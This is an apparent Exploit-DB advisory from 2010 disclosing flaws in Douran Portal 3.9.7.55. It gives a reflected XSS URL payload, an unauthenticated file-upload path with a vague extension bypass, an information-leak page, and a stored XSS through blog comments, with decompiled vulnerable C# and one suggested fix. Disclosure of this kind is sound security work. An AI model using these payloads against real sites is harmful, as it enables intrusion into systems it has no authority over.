douran portal 3.9.7.55 - Multiple Vulnerabilities

EDB-ID:

15382

CVE:





Platform:

ASP

Date:

2010-11-01


===========================================================
[+] Douran Portal <= V3.9.7.55 Multiple Remote Vulnerabilities
===========================================================
[+] Author : ItSecTeam
[+] Contact : Bug@itsecteam.com
[+] Site : www.itsecteam.com
[+] Forum : http://forum.itsecteam.com/
[+] Thanks : Amin Shokohi (Pejvak!) , homay
~~~~~~~~~~~~~~~~[Information]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Web App : Douran Portal
[+] Version : Worked In Last Version (V3.9.7.55) And Prior
[+] Software: http://www.douran.com
[+][+][+][+][+][+][+](Vulnerabilities)[+][+][+][+][=][+][+]

[1] Xss None Present :
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.OrderForm
private void Page_Load(object sender, EventArgs e)
{
    this.lblTitle.Text = Localize.GetString("ORDER_FOR", "Order form for")
+ " " + base.Request.QueryString["ItemTitle"];
}
Print Request.QueryString["ItemTitle"] Without Check
[~] Secure :
private void Page_Load(object sender, EventArgs e)
{
    this.lblTitle.Text = Localize.GetString("ORDER_FOR", "Order form for")
+ " " + CheckString(base.Request.QueryString["ItemTitle"]);
}
[-] End Poc
[#] Exploit :
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>


[2] Remote File Upload :
[Note] : Worked In Older 3.8.2.2
[~] Poc :
You Can Upload Your File Without Check Authorization
You Can Upload :
string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]


[3] Information Leakage Show Device Info :
http://Site.Com/security/DeviceInfo.aspx

[4] Xss Present :
http://Site.Com/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
blogDB.AddBlogComment(ModuleID, ItemID,
this.txtName.Text,this.txtTitle.Text, this.txtURL.Text,
this.txtComments.Text);
}
public void AddBlogComment(int moduleID, int itemID, string name, string
title, string url, string comment)
{
    if (name.Length < 1)
    {
        name = "unknown";
    }
    if (title.Length > 100)
    {
        title = title.Substring(0, 100);
    }
    if (name.Length > 100)
    {
        name = name.Substring(0, 100);
    }
    if (url.Length > 200)
    {
        url = url.Substring(0, 200);
    }
    SqlConnection sqlConnectionString = PortalSettings.SqlConnectionString;
    SqlCommand command = new SqlCommand("dp_BlogCommentAdd",
sqlConnectionString);
    command.CommandType = CommandType.StoredProcedure;
    SqlParameter parameter = new SqlParameter("@ModuleID", SqlDbType.Int, 4);
    parameter.Value = moduleID;
    command.Parameters.Add(parameter);
    SqlParameter parameter2 = new SqlParameter("@ItemID", SqlDbType.Int, 4);
    parameter2.Value = itemID;
    command.Parameters.Add(parameter2);
    SqlParameter parameter3 = new SqlParameter("@Name",
SqlDbType.NVarChar, 100);
    parameter3.Value = name;
    command.Parameters.Add(parameter3);
    SqlParameter parameter4 = new SqlParameter("@Title",
SqlDbType.NVarChar, 100);
    parameter4.Value = title;
    command.Parameters.Add(parameter4);
    SqlParameter parameter5 = new SqlParameter("@URL", SqlDbType.NVarChar,
200);
    parameter5.Value = url;
    command.Parameters.Add(parameter5);
    SqlParameter parameter6 = new SqlParameter("@Comment", SqlDbType.NText);
    parameter6.Value = comment;
    command.Parameters.Add(parameter6);
    sqlConnectionString.Open();
    command.ExecuteNonQuery();
    sqlConnectionString.Close();}
	[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]

~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~